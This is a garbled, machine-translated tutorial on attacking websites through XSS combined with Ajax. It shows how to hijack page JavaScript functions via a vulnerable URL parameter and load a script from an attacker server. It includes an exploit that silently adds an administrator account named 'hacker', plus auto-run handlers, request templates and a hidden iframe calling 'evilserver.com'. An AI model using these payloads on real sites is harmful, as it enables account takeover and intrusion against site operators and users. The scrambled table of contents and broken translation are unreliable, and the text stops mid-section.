Use advanced Ajax XSS Technology

Control your heart from evil baboons

Limit 0. Description
Routing 1. Using xss javascript hijacking
Authorization 2. Remote Call hijacking code
3. Use Ajax to do more: an advanced example based on XMLHttpRequest
4. Automatic Operation
5. Influence on Ajax sites
6. Potential for improvement of general technologies
7. Magix_quotes_pgc Problems
8. Permanent xss
Cooperation between xss and SQL Injection
Release 9.1.xss Vulnerability
 9.2. SQL Injection Vulnerability
. Write the exploitation tool
4.1.9. 4. Attack!
Resolve A. Solve xss Problems
Summary B. Conclusion
0. Description:
Most people think that the xss vulnerability is not powerful enough for two reasons. One of the reasons is that you may only use it to steal cookies, and the other reason is that you (mistakenly) Think (use) it requires the target to click a specific connection or access a specific website. In this article, I will prove that xss can do much more than steal cookies, even if you still need to click a specific link. A new technology called Ajax is spreading over the network. Ajax technology allows you to use javascript to send HTTP requests. A simple website without ajax functions is like this (working mode ):
Client request-response server response-response returned content-response Client
While ajax (working mode) is similar:
Client request-response javascript-response server response-response data-response javascript processing
I will start by showing you how to use the xss vulnerability to hijack javascript Functions. (further, we will see the impact of the website's over-Trust in javascript and the various possibilities of using this technology.
Before we start, you must do the following:
Configure magic_quotes_gpc = off
Allow javascript Execution in your browser
 Download these examples from my website (which ads like this ??)
1. Use xss to hijack javascript
Let's have a clear understanding of it. This is a php webpage code with xss vulnerability:
<Html>
<Head>
<Title> Javascript Hijack with XSS </title>
<Script type = "text/javascript" src = "script. js"> </script>
</Head>
<Body>
<? Php echo $ _ GET ["xss"];?>
<Input type = "Submit" onClick = "javascript: Hello ()" value = "Say Hello"/>
</Body>
</Html>
There is also a javascript script file with the code:
Function Hello ()
{
Alert ("Hi there ");
}
This is very simple. We have a webpage containing a button. When you click this button, a dialog box "Hi there" will pop up ".
Function "> http: // [host]/? Xss = <script> function Hello () {alert ("hijacked") ;}</script>
OK. Now we are clicking our button. What happened? We didn't get "Hi there", but got "hijacked "! This means that we can use the xss vulnerability to hijack javascript code. When a user calls a function, it will execute our code instead of the original code.
Well, we already know how to re-create javascript Functions in URLs. But if you need to re-create many functions, doing so through url will make you final. So let's recreate a new javascript file to include everything we need.
Function Hello ()
{
Alert ("Hijack from remote ");
}
Then we submit the url like this:
Http: // [host]/? Xss = <script type = "text/javascript" src = "http: // [edevil server]/hijack. js"> </script>
What happened when we click our button again? "Hijack from remote "! OK (till now) We know how to properly hijack javascript Functions.
2. Use Ajax to do more things: Advanced Application Instances of XMLHttpRequest
To demonstrate this technology, I wrote an example for teaching. (Please) download it from my website. I will apply some of its code and explain them. It is a simple administrator to add new administrators or publish messages on a blog. On the page add_message.php? Author = [xss] has an xss vulnerability, which we will use to attack!
I have compiled a lightweight exploit to hijack javascript functions. The code is:
Function createRequest ()
{
Var xmlHttp;
If (window. ActiveXObject)
{
XmlHttp = new ActiveXObject ("Microsoft. XMLHTTP ");
}
Else if (window. XMLHttpRequest)
{
XmlHttp = new XMLHttpRequest ();
}

Return xmlHttp;
}

Function validateForm ()
{
Var xmlHttp;

XmlHttp = createRequest ();
Url = "add_admin.php? Login = hacker & password = hacker & email = hacker ";
XmlHttp. open ("GET", url, true );
XmlHttp. send (null );
Document. location = "add_message.php ";
}
This vulnerability requires the Administrator to access this url:
Http: // [host]/add_message? Author = http: // [host]/? Xss =
<Script type = "text/javascript" src = "http: // [edevil server]/exploit. js"> </script>
When he clicks the submit button, our malicious code will add a user whose account password is "hacker" to the database. We can make the target run our malicious code! However, you still need to click the button ......
3. Automatic Execution
In the above example, the target always needs to click a button to complete the attack. Here is a solution for you:
Window. onload = function initHijack ()
{
[...]
}
Our attacks will be automatically completed after the target clicks a specific link. You can also execute some javascript code when the target closes the page:
Window. unload = function initHijack ()
{
[...]
}
4. Ajax Code Template
Here are some basic sample code for writing javascript exploit:
GET request:
Var url = "page. php? Param1 = value1 & param2 = value2 ";
Http. open ("GET", url, true );
Http. onreadystatechange = function (){
If (http. readyState = 4 & http. status = 200 ){
Alert (http. responseText );
}
}
Http. send (null );
POST request:
Var url = "page. php ";
Var params = "param1 = value1 & param2 = value2 ";
Http. open ("POST", url, true );

Http. setRequestHeader ("Content-type", "application/x-www-form-urlencoded ");
Http. setRequestHeader ("Content-length", params. length );
Http. setRequestHeader ("Connection", "close ");

Http. onreadystatechange = function (){
If (http. readyState = 4 & http. status = 200 ){
Alert (http. responseText );
}
}
Http. send (params );
Tip: In the POST request, you must set some HTTP header information. (In addition,) use open () to send a GET request.
Function RemoteGetWithOpen ()
{
Open ("http://www.evilserver.com/ajaxhack/evil.php? Param1 = value1 & param2 = value2 ");
}
Use iframe to send GET requests
Function CreateAbritraryIframe ()
{
// <Iframe src = "http://www.google.com/" style = "visibility: hidden;" name = "exploit">
Var objBody = document. getElementsByTagName ("body") [0];
Var objIframe = document. createElement ("iframe ");
// We set the "src" attribute
Var attribut_src = document. createAttribute ("src ");
Attribut_src.nodeValue = "http://www.evilserver.com/#...]";
ObjIframe. setAttributeNode (attribut_src );
// We hide it
Var attribut_visibility = document. createAttribute ("style ");
Attribut_visibility.nodeValue = "visibility: hidden ;";
ObjIframe. setAttributeNode (attribut_visibility );
// We set a name to our frame
Var attribut_name = document. createAttribute ("name ");
Attribut_name.nodeValue = "exploit ";
ObjIframe. setAttributeNode (attribut_name );
ObjBody. appendChild (objIframe );
}
5. Influence on Ajax sites. (Because the data is copied to the txt structure, it is too messy, and the translation is throttled, guilty, and guilty)
6. We